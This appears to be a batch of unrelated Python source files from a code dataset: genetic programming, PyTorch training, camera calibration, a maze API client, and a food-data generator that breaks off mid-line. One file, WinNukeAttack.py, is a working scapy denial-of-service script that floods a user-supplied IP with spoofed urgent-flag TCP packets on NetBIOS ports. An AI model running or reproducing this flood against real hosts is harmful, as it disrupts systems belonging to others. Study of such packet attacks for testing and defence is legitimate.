program.\r\n :returns: List that can be executed as a Push program.\r\n \"\"\"\r\n program = []\r\n for el in lst:\r\n # For each element in the list\r\n if type(el) == int or type(el) == float or type(el) == bool or type(el) == u.Character or type(el) == u.PushVector:\r\n # If ``el`` is an int, float, bool, Character object or PushVector object simply \r\n # append to the program because these are push literals.\r\n program.append(el)\r\n elif type(el) == instr.PyshInstruction or type(el) == instr.PyshInputInstruction or type(el) == instr.PyshClassVoteInstruction:\r\n # If ``el`` an instance of any of the instruction types, append to the program.\r\n program.append(el)\r\n elif u.is_str_type(el):\r\n # If ``el`` is a string:\r\n el = str(el)\r\n # Attempt to find an instruction with ``el`` as its name.\r\n matching_instruction = None\r\n try:\r\n matching_instruction = ri.get_instruction(el)\r\n except e.UnknownInstructionName():\r\n pass\r\n # If matching_instruction is None, it must be a ssring literal.\r\n if matching_instruction == None:\r\n program.append(el)\r\n else:\r\n program.append(matching_instruction)\r\n elif type(el) == list:\r\n # If ``el`` is a list (but not PushVector) turn it into a program\r\n # and append it to (aka. nest it in) the program.\r\n program.append(load_program_from_list(el))\r\n return program\r\n\r\ndef generate_random_population(evolutionary_params):\r\n \"\"\"Generate random population based on given evolutionary_params.\r\n\r\n :param dict evolutionary_params: Dict of evolutionary hyper-parameters.\r\n :returns: A list of Individual objects with randomly generated genomes and translated programs.\r\n \"\"\"\r\n population = []\r\n for i in range(evolutionary_params[\"population_size\"]):\r\n rand_genome = r.random_plush_genome(evolutionary_params['max_genome_initial_size'], evolutionary_params)\r\n new_ind = individual.Individual(rand_genome, evolutionary_params)\r\n population.append(new_ind)\r\n return population\r\n\r\ndef evaluate_individual(ind, error_function):\r\n \"\"\"Adds an error vector to an individual evaluated on the given error_function.\r\n\r\n :param Individual ind: An instance of the Individual class.\r\n :param function error_function: Python function that evaluates an individual based on its program.\r\n :return: Individual with error values assigned.\r\n \"\"\"\r\n if ind.get_errors() == []: # Only evaluate the individual if it hasn't been already.\r\n errors = error_function(ind.get_program())\r\n reporting.total_errors_in_evalutaion_order.append(sum(errors))\r\n ind.set_errors(errors)\r\n return ind\r\n\r\n\r\ndef evaluate_population(population, error_function, evolutionary_params):\r\n \"\"\"Updates the errors of the population.\r\n\r\n :param list population: List of Individual objects\r\n :param function error_function: Python function that evaluates an individual based on its program.\r\n :param dict evolutionary_params: Other parameters (see params.py)\r\n :returns: New population (list of Individuals) with error values assigned.\r\n \"\"\"\r\n if evolutionary_params['parallel_evaluation'] and (evolutionary_params[\"max_workers\"] == None or evolutionary_params[\"max_workers\"] > 1):\r\n # If parallel evalutation, map over the pool.\r\n pool = evolutionary_params['pool']\r\n return pool.map(evaluate_individual, population, [error_function]*len(population))\r\n else:\r\n # If serial evaluation\r\n return [evaluate_individual(ind, error_function) for ind in population]\r\n\r\ndef evolution(error_function, problem_params):\r\n \"\"\"Basic evolutionary loop. Currently the main GP function in ``pyshgp``.\r\n\r\n .. todo::\r\n This should soon be replaced by various base classes. These classes will\r\n include: 1) Evolver - A general evolution class with same functionality \r\n as this function 2) SymbolicRegressor - A class that extends \r\n scikit-learn for regression problems and 3) SymbolicClassifier - A class\r\n that extends scikit-learn for classification problems.\r\n\r\n :param function error_function: Python function that evaluates an individual based on its program.\r\n :param dict problem_params: Evolutionary params that should overide the pyshgp defaults for this run.\r\n \"\"\" \r\n\r\n # Get the params for the run\r\n evolutionary_params = u.merge_dicts(params.default_evolutionary_params, problem_params)\r\n params.grab_command_line_params(evolutionary_params)\r\n evolutionary_params['genetic_operator_probabilities'] = normalize_genetic_operator_probabilities(evolutionary_params['genetic_operator_probabilities'])\r\n\r\n # Make certain params globally accesable\r\n c.global_max_points = evolutionary_params['max_points']\r\n\r\n # Prepare for multi-threading if specified by user\r\n if evolutionary_params[\"max_workers\"] == None or evolutionary_params[\"max_workers\"] > 1:\r\n params.init_executor(evolutionary_params)\r\n\r\n # Print the params for the run\r\n print()\r\n print(\"=== Starting GP Run With Following Parameters ===\")\r\n params.params_pretty_print(evolutionary_params)\r\n print()\r\n\r\n # Create Initial Population\r\n print(\"Creating Initial Population\")\r\n population = generate_random_population(evolutionary_params)\r\n \r\n # Evaluate initial population to get their error vectors\r\n print(\"Evaluating Initial Population\")\r\n start_time = datetime.datetime.now()\r\n population = evaluate_population(population, error_function, evolutionary_params)\r\n end_time = datetime.datetime.now()\r\n reporting.log_timings(\"evaluation\", start_time, end_time)\r\n\r\n stop_reason = None\r\n for g in range(evolutionary_params[\"max_generations\"]):\r\n print()\r\n print(\"Starting Generation:\", g)\r\n\r\n start_time = datetime.datetime.now()\r\n # Select parents and mate them to create offspring\r\n print(\"Performing selection and variation.\")\r\n offspring = go.genetics(population, evolutionary_params, )\r\n end_time = datetime.datetime.now()\r\n reporting.log_timings(\"genetics\", start_time, end_time)\r\n\r\n print(\"Evaluating new individuals in population.\")\r\n start_time = datetime.datetime.now()\r\n offspring = evaluate_population(offspring, error_function, evolutionary_params)\r\n end_time = datetime.datetime.now()\r\n reporting.log_timings(\"evaluation\", start_time, end_time)\r\n \r\n print(\"Installing next generation.\")\r\n population = offspring\r\n #population = sorted(population, key=lambda ind: ind.get_total_error())\r\n \r\n # Print things user wants to monitor\r\n monitor.print_monitors(population, evolutionary_params[\"things_to_monitor\"])\r\n\r\n # Check for any solutions\r\n solutions = [ind for ind in population if ind.get_total_error() <= evolutionary_params[\"error_threshold\"]]\r\n if len(solutions) > 0:\r\n print()\r\n print(\"Solution Found On Generation \" + str(g) + \":\")\r\n print(\"Program:\")\r\n print(solutions[0].get_program())\r\n print(\"Genome:\")\r\n print(solutions[0].get_genome())\r\n print()\r\n simp.auto_simplify(solutions[0], error_function, evolutionary_params[\"final_simplification_steps\"])\r\n stop_reason = 'Solution Found'\r\n break # Finish evolutionary run\r\n\r\n if g == evolutionary_params['max_generations'] - 1:\r\n print()\r\n print('Failure')\r\n print('Best program in final generation:')\r\n print(population[0].get_program())\r\n print('Errors:', population[0].get_errors())\r\n stop_reason = 'Max Generation'\r\n\r\n print()\r\n print(\"Generating End of Run Reports\")\r\n if evolutionary_params[\"reports\"][\"timings\"]:\r\n reporting.print_timings()\r\n print()\r\n\r\n\r\n\r\n","sub_path":"pyshgp/gp/gp.py","file_name":"gp.py","file_ext":"py","file_size_in_byte":10139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"86344870","text":"import torch\nimport torch.nn as nn\nimport os, argparse, time, math, pdb\n#import model_Baseline as model\nimport model_langtest as model\nimport numpy as np\nfrom data_loader_lang_test import NFOV\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\n\ndef train(encoder, decoder, optimizer, criterion, MAX_LENGTH):\n\n loss_epoch = []\n for batch_idx, ( _, lang, lang_length, index) in enumerate(train_loader):\n if use_cuda:\n lang, lang_length = lang.cuda(), lang_length.cuda()\n lang, lang_length = Variable(lang), Variable(lang_length)\n lang_max_length = lang.size()[2]\n loss_frame = 0\n for vi in range(3):\n loss = 0\n encoder_hidden, encoder_memory = encoder.initHidden(use_cuda)\n encoder_output_list = encoder(lang[:,vi,:], encoder_hidden, encoder_memory)\n encoder_output = Variable(torch.FloatTensor(encoder_output_list[-1].size()).zero_()).cuda()\n for bi in range(batch_size):\n encoder_output[bi, :] = encoder_output_list[lang_length[bi,vi].data.cpu().numpy()[0]-1][bi,:]\n #NFOV_output, NFOV_memory, NFOV_att= my_model(img_variable, encoder_output, NFOV_output_last, NFOV_memory) # add previous att\n #NFOV_output, NFOV_att = my_model(img_variable, encoder_output)\n #NFOV_output_last = NFOV_output\n #decoder_input = NFOV_output\n decoder_input = encoder_output\n #decoder_input = Variable(torch.FloatTensor(4, 256).zero_()).cuda()\n decoder_hidden, decoder_memory = decoder.initHidden(use_cuda)\n\n decoder_output_list, decoder_prob_list = decoder(lang[:,vi,:], decoder_input, decoder_hidden, decoder_memory)\n pdb.set_trace()\n\n for di in range(1, MAX_LENGTH):\n loss += criterion(decoder_prob_list[di-1], lang[:,vi,di])\n loss = loss / MAX_LENGTH\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n loss_frame += loss.data[0]\n loss_epoch.append(loss_frame / img_length)\n if batch_idx % 5 == 0:\n tt = time.time()\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * train_loader.batch_size, len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data[0]))\n print('time cost:'+str(tt-ts))\n if batch_idx == len(train_loader) - 2:\n break\n return sum(loss_epoch) / len(train_loader)\n\n\ndef trainEpoches(encoder, decoder, n_epoches, MAX_LENGTH, print_every=1, plot_every=100, learning_rate=0.01):\n start = time.time()\n\n all_parameters = list(encoder.parameters()) + list(decoder.parameters())\n optimizer = optim.Adam(all_parameters, lr=learning_rate)\n criterion = nn.NLLLoss()\n\n for Epoches in range(1, n_epoches + 1):\n if int(Epoches)%25 == 0:\n learning_rate = learning_rate/10\n print('Learning rate = ' , learning_rate)\n optimizer = optim.SGD(all_parameters, lr=learning_rate)\n\n loss_epoch = train(encoder, decoder, optimizer, criterion, MAX_LENGTH)\n\n if Epoches % print_every == 0:\n print('Epoch %d is done.' % (Epoches))\n print('Overall time cose: %s (%d %d%%) Avg. Loss: %.4f' % (timeSince(start, float(Epoches) / n_epoches),\n Epoches, Epoches / n_epoches * 100, loss_epoch))\n\n #if Epoches % 10 == 0:\n #torch.save(encoder, '/home/Han/Han_NIPS/model/snap_shot/our_FeaMap2_2/ratio_2/encoder_%d' % (Epoches))\n #torch.save(my_model, '/home/Han/Han_NIPS/model/snap_shot/our_FeaMap2_2/ratio_2/my_model_%d' % (Epoches))\n #torch.save(decoder, '/home/Han/Han_NIPS/model/snap_shot/our_FeaMap2_2/ratio_2/decoder_%d' % (Epoches))\n #recall_final, recall_all = test(Epoches, encoder, my_model, max_length=30)\n #print(\"Final recall for %d test videos: %.3f\" %(len(os.listdir('/home/Han/Han_NIPS/model/word_to_index_sample_60_test_percent100/')), np.mean(recall_all)))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='PyTorch 360 Video Groundu=ing')\n parser.add_argument('--batch_size', type=int, default=4, metavar='N',\n help='input batch size for training (default: 4)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='enables CUDA training')\n parser.add_argument('--video_len', type=str, default='3',\n help='video clip sample length (default: 3)')\n parser.add_argument('--MAX_LENGTH', type=str, default='33',\n help='subtitle maximum length (default: 33)') ##train 33, test 30\n args = parser.parse_args()\n\n use_cuda = torch.cuda.is_available()\n batch_size = args.batch_size\n MAX_LENGTH = int(args.MAX_LENGTH)\n hidden_size = 256\n video_len = int(args.video_len)\n img_ratio = 2\n epoches = 100\n\n nfov = NFOV('/home/Han/Han_NIPS/NIPS_data/frame_train_2/', video_len, img_ratio, train='train')\n train_loader = torch.utils.data.DataLoader(nfov, batch_size, shuffle=True, num_workers=4)\n lang_len = nfov.get_lang_length()\n my_encode = model.EncoderRNN(lang_len, hidden_size, batch_size).cuda()\n my_decode = model.DecoderRNN(lang_len, hidden_size, batch_size, MAX_LENGTH).cuda()\n trainEpoches(my_encode, my_decode, epoches, MAX_LENGTH, print_every=1)\n #train(my_encode, my_decode, MAX_LENGTH)\n","sub_path":"LanguageTest.py","file_name":"LanguageTest.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"601382630","text":"import scapy.all as scapy\nimport os\n\n\ndef WinNuke():\n\n\tclear = os.system('clear')\n\n\tprint(\"**************************************\")\n\tprint(\" WinNuke Attack\")\n\tprint(\"**************************************\")\n\tprint(\"Please input your target's IP\")\n\ttarget = input(\"[WinNuke Attack]#\")\n\tnum = 0\n\ttry:\n\t\twhile True:\n\t\t\tpacketss = scapy.IP(src=scapy.RandIP(),dst=target)/scapy.TCP(sport=scapy.RandShort(),dport=[139,138,137],flags=0x020,seq=1,window=512)\n\t\t\tscapy.send(packetss,verbose=False)\n\t\t\tnum += 1\n\t\t\tprint(\"Sent \"+str(num)+\"packets\")\n\texcept KeyboardInterrupt:\n\t\tprint(\"[-] Ctrl + C detected.......\")\n\t\nWinNuke()","sub_path":"scapy-test/scapy-test/Packet-basedAttack/WinNukeAttack.py","file_name":"WinNukeAttack.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"56941936","text":"from setuptools import setup\nfrom setuptools import find_packages, setup\n\nwith open(\"README.md\", \"r\") as fh:\n readme = fh.read()\n\nsetup(name='qfunction',\n version='1.0.144',\n url='https://github.com/gpftc/qfunction',\n license='MIT License',\n author='Reinan Br',\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n author_email='slimchatuba@gmail.com',\n keywords='qfunction non-extensive mechanical statistical data science',\n description=u'Library for data mining about covid-19 in brazilian cities',\n packages=find_packages(),\n install_requires=['numpy','qutip','tqdm','matplotlib','pillow','mechanicalsoup','psutil','requests','pandas'],)","sub_path":".history/setup_20210710224042.py","file_name":"setup_20210710224042.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"518810917","text":"\"\"\"\nWe have an array A of non-negative integers.\n\nFor every (contiguous) subarray B = [A[i], A[i+1], ..., A[j]] (with i <= j),\nwe take the bitwise OR of all the elements in B, obtaining a result A[i] | A[i+1] | ... | A[j].\n\nReturn the number of possible results. (Results that occur more than once are only counted\nonce in the final answer.)\n\"\"\"\nclass Solution(object):\n def subarrayBitwiseORs(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n \"\"\"\n # Brute Force TLE\n res = set()\n for i in range(len(A)):\n n = 0\n for j in range(i, len(A)):\n for a in A[i:j+1]:\n n |= a\n res.add(n)\n\n return len(res)\n\n def subarrayBitwiseORs2(self, A):\n ans = set()\n cur = {0}\n for x in A:\n cur = {x | y for y in cur} | {x}\n ans |= cur # union\n return len(ans)\n\nA = [1,2,4]\nprint(Solution().subarrayBitwiseORs2(A))","sub_path":"898BitwiseOr.py","file_name":"898BitwiseOr.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"145853184","text":"import sys\nimport cv2\nimport os\nimport time\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5 import QtWidgets, uic\nimport numpy as np\n\nimport matplotlib\n\nfrom sys import platform as sys_pf\nif sys_pf == 'darwin':\n import matplotlib\n matplotlib.use(\"TkAgg\")\n\nfrom matplotlib import pyplot as plt\nfrom numpy.linalg import inv\n\nimport time\nimport threading\n\n\npath = os.getcwd()\nqtCreatorFile = path + os.sep + \"mainwindow.ui\"\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile) \n\nimgpath = path + os.sep + \"CameraCalibration\"\nimglist = os.listdir(imgpath)\nimglistd = [i[:-4] for i in imglist]\nimglistd = np.sort(np.array(imglistd).astype('int'))\nimgSortedList = [format(i)+\".bmp\" for i in imglistd]\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MainWindow, self).__init__(parent)\n self.setupUi(self)\n self.onBindingUI()\n\n self.imgSortedList = imgSortedList\n self.selected_img = self.imgSortedList[0]\n print(self.selected_img)\n\n self.objpoints = []\n self.imgpoints = []\n\n self.gray_imgs = []\n self.color_imgs = []\n\n # Camera parameter\n self.RMS = None\n self.camera_matrix = []\n self.distortion_coefficients = []\n self.rotation_matrix = []\n\n # pyramid\n self.pyramid_img = []\n\n # pre-read imgs in memory as array\n self.read_img()\n \n\n def read_img(self):\n for i in range(len(self.imgSortedList)):\n print(imgpath + os.sep + self.imgSortedList[i])\n img = cv2.imread(imgpath + os.sep + self.imgSortedList[i])\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n self.color_imgs.append(img)\n self.gray_imgs.append(gray)\n\n def onBindingUI(self):\n self.bt_find_corners.clicked.connect(self.on_bt_find_corners_click)\n #self.bt_intrinsic.clicked.connect(self.on_bt_find_intrinsic_click)\n self.comboBox.addItems(imgSortedList)\n self.comboBox.activated[str].connect(self.comboBox_onChanged) \n self.bt_cancel.clicked.connect(self.on_bt_cancel_click)\n\n self.bt_intrinsic.clicked.connect(self.on_bt_intrinsic_click)\n self.bt_distortion.clicked.connect(self.on_bt_distortion_click)\n self.bt_extrinsic.clicked.connect(self.on_bt_extrinsic_click)\n self.bt_augmented_reality.clicked.connect(self.on_bt_augmented_reality_click)\n\n self.bt_rot_scale_translate.clicked.connect(self.on_bt_rot_scale_translate_click)\n\n def on_bt_find_corners_click(self):\n find_corner_img = self.find_imgs_corner()\n #plt.figure(figsize=(10,10))\n for i in range(len(find_corner_img)):\n # plt.subplot(4,4,i)\n # plt.imshow(find_corner_img[i])\n t = threading.Thread(target = self.diaplay_imgs(find_corner_img[i],i))\n t.start()\n # plt.savefig(path + \"/result.jpg\")\n # self.diaplay_imgs(path + \"/result.jpg\")\n \n\n\n\n def on_bt_cancel_click(self):\n sys.exit(app.exec_())\n\n def on_bt_intrinsic_click(self):\n if len(self.camera_matrix) == 0:\n self.camera_calibration()\n print (\"Intrinsic matrix:\\n\", self.camera_matrix)\n\n def on_bt_distortion_click(self):\n #print(self.distortion_coefficients)\n if len(self.distortion_coefficients) == 0 :\n self.camera_calibration()\n print (\"Distortion matrix:\\n\", self.distortion_coefficients)\n\n def on_bt_extrinsic_click(self):\n if len(self.distortion_coefficients) == 0 :\n self.camera_calibration()\n #print(self.selected_img[:-4])\n idx = self.selected_img[:-4]\n print (\"Extrinsic matrix of img \"+idx+\" :\\n\", self.rotation_matrix[int(idx)-1])\n\n def on_bt_rot_scale_translate_click(self):\n try:\n angel = int(self.lineEdit_angle.text())\n except:\n angel = 0\n\n try:\n scale = int(self.lineEdit_scale.text())\n except:\n scale = 1.0\n\n try:\n tx = int(self.lineEdit_tx.text())\n except:\n tx = 0\n \n try:\n ty = int(self.lineEdit_ty.text())\n except:\n ty = 0\n\n imgE = cv2.imread(path + os.sep + \"OriginalTransform.png\")\n\n R = cv2.getRotationMatrix2D((130,125),angel,scale)\n\n rows,cols = imgE.shape[:2]\n H = np.float32([[1,0,tx],[0,1,ty]])\n res = cv2.warpAffine(imgE,R,(cols,rows))\n res = cv2.warpAffine(res,H,(cols,rows))\n\n t = threading.Thread(target = self.diaplay_imgs(res,0))\n t.start()\n #print(angel)\n\n def comboBox_onChanged(self,text):\n self.selected_img = text\n\n def diaplay_imgs(self, imgs, idx):\n leng = len(imgs)\n #plt.figure(figsize=(10,10))\n #for i in range(leng):\n cv2.imshow('img'+format(idx+1),imgs)\n cv2.waitKey(0)\n # time.sleep(5)\n cv2.destroyAllWindows()\n #plt.subplot(2,int(leng/2),i)\n #plt.imshow(imgs)\n\n def camera_calibration(self):\n if len(self.objpoints) == 0 :\n self.find_imgs_corner()\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(self.objpoints, self.imgpoints, self.gray_imgs[0].shape[::-1],None,None)\n self.RMS = ret\n self.camera_matrix = mtx\n self.distortion_coefficients = dist.ravel()\n \"\"\"\n # rvecs is rotation vector, not the rotation matrix\n # tvecs is translation vector\n Vr = np.array(rvecs)\n Tr = np.array(tvecs)\n extrinsics = np.concatenate((Vr, Tr), axis=1).reshape(-1,6)\n \"\"\"\n \n #print(np.array(rvecs).shape)\n # rt,_ = cv2.Rodrigues(np.array(rvecs)[0])\n\n \n\n # Tr = np.array(tvecs)\n # #rtt = np.append(rt.T, Tr[0])\n\n # ex = np.concatenate((rt, Tr[0]),axis = 1)\n\n # print(\"RT : \\n\",rt.T)\n # print(\"R : \\n\",rt)\n # #print(\"RTT : \\n\",rtt)\n # print(\"TR : \\n\",Tr[0].T[0])\n # print(\"ex : \\n\",ex)\n #print(dist)\n #print(np.array(rt).shape)\n Vr = np.array(rvecs)\n Tr = np.array(tvecs)\n for i in range(len(Tr)):\n rt,_ = cv2.Rodrigues(Vr[i])\n\n ex = np.concatenate((rt, Tr[i]),axis = 1)\n self.rotation_matrix.append(ex)\n \n # extrinsics = np.concatenate((Vr, Tr), axis=1).reshape(-1,6)\n # print(extrinsics)\n\n def find_imgs_corner(self):\n\n find_corner_img = []\n\n for i in range(len(self.imgSortedList)):\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 500, 0.001)\n\n objp = np.zeros((8*11,3), np.float32)\n objp[:,:2] = np.mgrid[0:11,0:8].T.reshape(-1,2)\n\n img = self.color_imgs[i]\n #print(img.shape)\n gray = self.gray_imgs[i]\n #print(gray.shape)\n\n ret, corners = cv2.findChessboardCorners(gray, (11,8),None)\n #print(ret)\n\n if ret == True:\n self.objpoints.append(objp)\n #print(np.array(corners).shape)\n corners2 = cv2.cornerSubPix(gray,corners,(11,8),(-1,-1),criteria)\n self.imgpoints.append(corners2)\n\n # Draw and display the corners\n img = cv2.drawChessboardCorners(img, (11,8), corners2,ret)\n img = cv2.resize(img, (600, 600)) \n find_corner_img.append(img)\n else:\n img = cv2.resize(img, (600, 600)) \n find_corner_img.append(img)\n return find_corner_img\n\n\n def on_bt_augmented_reality_click(self):\n pyramid_imgs = self.caculate_pyramid()\n\n print(len(pyramid_imgs))\n\n for i in range(len(pyramid_imgs)):\n # plt.subplot(4,4,i)\n # plt.imshow(find_corner_img[i])\n t = threading.Thread(target = self.diaplay_imgs(pyramid_imgs[i],i))\n t.start()\n\n def caculate_pyramid(self):\n pyramid_imgs = []\n if len(self.distortion_coefficients) == 0 :\n self.camera_calibration()\n\n for i in range(10):\n img = self.color_imgs[i].copy()\n _, corners = cv2.findChessboardCorners(self.gray_imgs[i], (11,8),None)\n #print(tuple(corners[0][0]))\n ################################################################################################\n p1 = corners[-1][0].reshape(len(corners[-1][0]),1)\n p1 = np.concatenate((p1, np.array([[1],[1]])),axis = 0)\n\n p2 = corners[-2][0].reshape(len(corners[-2][0]),1)\n p2 = np.concatenate((p2, np.array([[1],[1]])),axis = 0)\n\n p3 = corners[-12][0].reshape(len(corners[-12][0]),1)\n p3 = np.concatenate((p3, np.array([[1],[1]])),axis = 0)\n\n p4 = corners[-13][0].reshape(len(corners[-13][0]),1)\n p4 = np.concatenate((p4, np.array([[1],[1]])),axis = 0)\n\n p_h = corners[-11][0].reshape(len(corners[-11][0]),1)\n p_h = np.concatenate((p_h, np.array([[1],[1]])),axis = 0)\n\n p_v = corners[-82][0].reshape(len(corners[-82][0]),1)\n p_v = np.concatenate((p_v, np.array([[1],[1]])),axis = 0)\n ################################################################################################\n rt = np.concatenate((self.camera_matrix@self.rotation_matrix[i], np.array([[0.,0.,0.,1.]])),axis = 0)\n\n x1 = np.linalg.inv(rt) @ p1\n x2 = np.linalg.inv(rt) @ p2\n x3 = np.linalg.inv(rt) @ p3\n #x4 = np.linalg.inv(rt) @ p4\n x4 = x1 + (x3-x1) + (x2-x1)\n\n ################################################################################################\n x5 = x1 + (x1-x4) \n x6 = x2 + (x2-x4) \n x7 = x3 + (x3-x4) \n\n #print(x3)\n #print(x2)\n vec = np.cross((p_v-x5).T[0][:3], (p_h-x5).T[0][:3])\n\n vec = vec /(vec**2).sum()**0.5\n\n #print(\"ves+\\n\",vec)\n #print(\"ves\\n\",500*(x2-x1).T[0][:3])\n vec = np.concatenate((vec.reshape(len(vec),1), np.array([[1.]])),axis = 0)\n #print(((x3-x1).T[0][:3]**2).sum()**0.5)\n center = (x4+x5+x6+x7)/4\n x8 = center + vec*((x3-x1).T[0]**2).sum()**0.5 + 0.4*(x2-x1)\n x8[3][0] = 1\n #print(x8)\n ################################################################################################\n p1 = rt@x1\n p1 = p1.reshape(1,len(p1))[0][:2]\n \n p2 = rt@x2\n p2 = p2.reshape(1,len(p2))[0][:2]\n\n p3 = rt@x3\n p3 = p3.reshape(1,len(p3))[0][:2]\n\n p3 = rt@x3\n p3 = p3.reshape(1,len(p3))[0][:2]\n\n p4 = rt@x4\n p4 = p4.reshape(1,len(p4))[0][:2]\n\n p5 = rt@x5\n p5 = p5.reshape(1,len(p5))[0][:2]\n\n p6 = rt@x6\n p6 = p6.reshape(1,len(p6))[0][:2]\n\n p7 = rt@x7\n p7 = p7.reshape(1,len(p7))[0][:2]\n\n p8 = rt@x8\n #print(\"p8\\n\",p8)\n p8 = p8.reshape(1,len(p8))[0][:2]\n ################################################################################################\n\n #print(\"P1\\n\",p1)\n\n #img = cv2.circle(img,tuple(p1.astype('int')), 30, (0, 255, 255), 3)\n #img = cv2.circle(img,tuple(p2.astype('int')), 30, (0, 255, 255), 3)\n #img = cv2.circle(img,tuple(p3.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p4.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p5.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p6.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p7.astype('int')), 30, (0, 255, 255), 3)\n # img = cv2.circle(img,tuple(p8.astype('int')), 30, (0, 255, 255), 3)\n\n img = cv2.line(img, tuple(p4.astype('int')), tuple(p6.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p6.astype('int')), tuple(p5.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p5.astype('int')), tuple(p7.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p7.astype('int')), tuple(p4.astype('int')), (0, 0, 255), 10)\n\n img = cv2.line(img, tuple(p8.astype('int')), tuple(p4.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p8.astype('int')), tuple(p5.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p8.astype('int')), tuple(p6.astype('int')), (0, 0, 255), 10)\n img = cv2.line(img, tuple(p8.astype('int')), tuple(p7.astype('int')), (0, 0, 255), 10)\n\n #img = cv2.line(img, tuple(p1.astype('int')), tuple(p8.astype('int')), (0, 0, 255), 10)\n \n \n img = cv2.resize(img, (600, 600)) \n pyramid_imgs.append(img)\n return pyramid_imgs\n # t = threading.Thread(target = self.diaplay_imgs(img,0))\n # t.start()\n # point = []\n # self.pyramid_img\n # self.color_imgs\n \n \n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())\n","sub_path":"hw1/hw1-1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"457880233","text":"import sys\nimport requests\nimport json\nfrom map_builder import Map\n\nclass Maze:\n\n def __init__(self, key, mapJson = [], command = ''):\n self.api_key = key\n self.url = \"https://lambda-treasure-hunt.herokuapp.com/api/adv/\"\n self.headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Token \" + self.api_key}\n\n self.map = Map()\n\n self.command = command\n self.pl_name = \"\",\n self.pl_cooldown = 0,\n self.pl_encumbrance = 0,\n self.pl_strength = 0,\n self.pl_speed = 0,\n self.pl_gold = 0,\n self.pl_inventory = [],\n self.pl_status = [],\n self.pl_error = [],\n self.pl_message = []\n\n def get_status(self):\n\n res = requests.get(self.url + \"init\", headers=self.headers)\n data = res.json() \n self.map.add_to_map(data)\n print(data[\"room_id\"], \"exits:\", data[\"exits\"])\n\n def add_to_map(self, room=None):\n if self.command:\n print(self.command)\n url = \"https://lambda-treasure-hunt.herokuapp.com/api/adv/move/\"\n r = requests.post(url, headers=self.headers, json={\"direction\": self.command})\n new_room = r.json()\n print(new_room.get(\"cooldown\"))\n # print(\"New room:\", new_room[\"cooldown\"])\n self.map.add_to_map(new_room)\n else:\n print(\"Not working\")\n\n def move_to_room(self, direction):\n print(direction)\n url = \"https://lambda-treasure-hunt.herokuapp.com/api/adv/move/\"\n r = requests.post(url, headers=self.headers, json={\"direction\": direction})\n next_room = r.json()\n \n print(next_room)\n print(next_room.get(\"room_id\"))","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"562789725","text":"import pandas as pd\r\nimport csv,io\r\nimport math\r\n\r\nimport requests\r\nimport json\r\nimport pprint\r\nimport random\r\nimport datetime\r\nfrom datetime import timedelta\r\nfrom datetime import datetime\r\n\r\nfrom geopy.geocoders import Nominatim\r\n#from collections import OrderedDict\r\n#import geocoder\r\nimport collections\r\n\r\nfrom faker import Factory\r\nfake = Factory.create('en_AU')\r\n\r\nprint('Food Simple')\r\ndf_foodsimple = pd.read_csv (r'foodsimple.csv')\r\nFoodSimple_Catalog=len(df_foodsimple)\r\nprint (df_foodsimple)\r\nprint (FoodSimple_Catalog)\r\n\r\nprint('Food Fridge')\r\ndf_foodfridge = pd.read_csv (r'foodfridge.csv')\r\nFoodFridge_Catalog=len(df_foodfridge)\r\nprint (df_foodfridge)\r\nprint (FoodFridge_Catalog)\r\n\r\nprint('Food Shelf')\r\ndf_foodshelf = pd.read_csv (r'foodshelf.csv')\r\nFoodShelf_Catalog=len(df_foodshelf)\r\nprint (df_foodshelf)\r\nprint (FoodShelf_Catalog)\r\n\r\n# 3 SuperMkts acting as Donors\r\n# for 90 Days\r\n# look at using 3 separate Food Data Sets\r\n\r\n# foodsimple - every day food - all 12 items\r\n# foodfridge - choose daily from 452 items\r\n# foodshelf - choose weekly from 229 items\r\n\r\n# Supermarkets/Partners = ['FoodieLand','LoMarket','Grocertown'] \r\n\r\n# normal to low to high to low to normal \r\n# Jason Lowe Index Factor\r\n# JLOF_INDEX = [5, 3, 1, 8, 9, 